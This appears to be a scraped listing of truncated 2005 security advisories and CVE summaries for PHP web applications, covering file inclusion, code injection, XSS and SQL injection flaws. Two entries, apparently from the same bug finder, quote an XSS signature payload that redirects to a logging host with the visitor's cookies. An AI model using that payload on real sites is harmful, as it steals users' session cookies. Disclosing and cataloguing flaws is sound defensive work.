CVE-2005-2793

PHP remote file inclusion vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to execute arbitrary PHP code via the customwelcomepage parameter...

Simple Machines Forum < 1.0.7 Code Injection

Binary data 3198.prm...

lduXSS2.txt

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie and post a topic...

CMS Made Simple 0.10 - &#039;Lang.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary remote PHP code on an affected...

phpGroupWare: Multiple vulnerabilities

Background phpGroupWare is a multi-user groupware suite written in PHP. Description phpGroupWare improperly validates the "mid" parameter retrieved via a forum post. The current version of phpGroupWare also adds several safeguards to prevent XSS issues, and disables the use of a potentially...

Debian DSA-789-1 : php4 - several vulnerabilities

Several security related problems have been found in PHP4, the server-side, HTML-embedded scripting language. The Common Vulnerabilities and Exposures project identifies the following problems : - CAN-2005-1751 Eric Romang discovered insecure temporary files in the shtool utility shipped with PHP...

CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

CVE-2005-2717

PHP remote file inclusion vulnerability in WebCalendar before 1.0.1 allows remote attackers to execute arbitrary PHP code when opening settings.php, possibly via sendreminders.php or other scripts...

Land Down Under

Bug finder:spyMASter Web site:Realhackers.net Contact:[email protected] LDU has some xss vulns Firstly you can use html codes in your signature you can get cookies with this put your signature that code SCRIPT location.href='http://site.com/log/ekle.php?c='+escapedocument. cookie/SCRIPT an...

AutoLinks Pro 'al_initialize.php alpath Parameter Remote File Inclusion

The remote host is running AutoLinks Pro, a commercial link management package. The version of AutoLinks Pro installed on the remote host allows attackers to control the 'alpath' parameter used when including PHP code in the 'alinitialize.php' script. By leveraging this flaw, an unauthenticated...

CVE-2005-2699

Unrestricted file upload vulnerability in admin/admin.php in PHPKit 1.6.1 allows remote authenticated administrators to execute arbitrary PHP code by uploading a .php file to the content/images/ directory using images.php. NOTE: if a PHPKit administrator must already have access to the end system...

CVE-2005-2685

SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via a direct request to admin/PhpMyExplorer/editerfichier.php, then editing the desired file to contain the PHP code, as demonstrated using header.php in the fichier parameter. NOTE: it is possible that this vulnerability ste...

CVE-2005-2687

PHP remote file inclusion vulnerability in SaveWebPortal 3.4 allows remote attackers to execute arbitrary PHP code via the 1 SITEPath parameter to menudx.php or 2 CONTENTSDir parameter to menusx.php...

phpkit161.txt

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1 Version: PHPKit 1.6.1 Risk: High if magicquotesgpc = Off URL: http://www.phpkit.com SQL Injection in include.php?path=login/member.php The parameters usernick and letters are vulnerable to SQL Injections. POC:...

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1 Version: PHPKit 1.6.1 Risk: High if magicquotesgpc = Off URL: http://www.phpkit.com SQL Injection in include.php?path=login/member.php The parameters usernick and letters are vulnerable to SQL Injections. POC:...

[SA16475] LiveSupport PEAR XML_RPC Nested XML Tags PHP Code Execution

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

CVE-2005-2612

The CVE covers a Direct code injection vulnerability in WordPress 1.5.1.3 and earlier that allows remote attackers to execute arbitrary PHP code via the cache_lastpostdate[server] cookie. Affected software is WordPress (versions prior to 1.5.1.3). Root cause is improper handling of the cache_last...

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cachelastpostdateserver cookie...

CVE-2005-2612

Direct code injection vulnerability in WordPress 1.5.1.3 and earlier allows remote attackers to execute arbitrary PHP code via the cachelastpostdateserver cookie...

CVE-2005-2567

CVE-2005-2567 affects SysCP 1.2.10 and earlier. The vulnerability is a PHP remote file inclusion via the language parameter, enabling an attacker to execute arbitrary PHP code on the server. The issue is documented in the CVE entry and corroborated by related advisories; no explicit exploit detai...